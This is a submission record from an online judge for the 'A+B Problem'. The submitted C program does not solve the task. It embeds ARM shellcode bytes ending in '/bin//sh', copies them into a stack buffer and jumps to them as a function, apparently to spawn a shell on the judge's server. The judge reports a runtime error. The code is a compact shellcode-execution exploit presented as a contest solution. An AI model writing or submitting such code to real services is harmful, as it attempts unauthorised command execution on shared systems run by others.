提交记录 17195


用户 题目 状态 得分 用时 内存 语言 代码长度
Hurrison 1000i. 【传统题】 A+B Problem Runtime Error 0 9.16 us 12 KB C++11 511 B
提交时间 评测时间
2021-12-05 19:58:13 2021-12-05 19:58:15
#include <stdio.h>
#include <string.h>

char *SC =      "\x01\x30\x8f\xe2"
                "\x13\xff\x2f\xe1"
                "\x78\x46\x0e\x30"
                "\x01\x90\x49\x1a"
                "\x92\x1a\x08\x27"
                "\xc2\x51\x03\x37"
                "\x01\xdf\x2f\x62"
                "\x69\x6e\x2f\x2f"
                "\x73\x68";

int main(void)
{
    char payload[34];

    memcpy(payload, SC, 34);

    fprintf(stdout, "Length: %d\n", strlen(SC));
    (*(void(*)()) payload) ();

return 0;
}

CompilationN/AN/ACompile OKScore: N/A

Testcase #19.16 us12 KBRuntime ErrorScore: 0


Judge Duck Online | 评测鸭在线
Server Time: 2024-04-24 21:19:18 | Loaded in 1 ms | Server Status
个人娱乐项目,仅供学习交流使用